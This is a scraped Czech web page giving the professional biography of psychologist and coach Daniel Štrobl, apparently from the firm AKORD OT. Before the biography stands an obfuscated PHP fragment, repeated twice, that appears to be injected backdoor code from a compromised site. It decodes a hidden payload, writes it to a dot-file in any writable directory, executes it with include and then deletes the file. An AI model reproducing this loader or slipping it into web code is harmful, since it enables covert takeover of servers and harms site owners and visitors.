100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Daniel Štrobl - AKORD OT

je zkušeným lektorem a koučem

  • je lektorem Institutu aplikované psychoanalýzy a má vlastní psychoterapeutickou praxi
  • je zkušeným lektorem a koučem v rámci firemního vzdělávání v oblasti měkkých dovedností
  • organizuje, či se jako hodnotitel podílí na AC/DC (práce s psychologickou a pracovní psychodiagnostikou)
  • má zkušenosti s výběrem lidí na pozice výkonných částí týmu i středního managementu
  • několik let působil v Psychiatrické léčebně v Praze Bohnicích. Od roku 2000 do roku 2008 pracoval jako psycholog pro Armádu České republiky. Absolvoval řadu krátkodobých i střednědobých misí do oblastí působení našich vojáků v zahraničí.
  • vystudoval psychosociální vědy na Husitské teologické fakultě University Karlovy v Praze a jednooborovou psychologii na Filosofické fakultě University Palackého v Olomouci
  • absolvoval psychoterapeutický výcvik v psychoanalytické psychoterapii
  • pravidelně přispívá do celoplošných médií, zejména MF Dnes a Lidových novin. Jako experta na problematiku mezilidských vztahů, stresu a lidského chování v zátěži si ho příležitostně zve Česká televize a Český rozhlas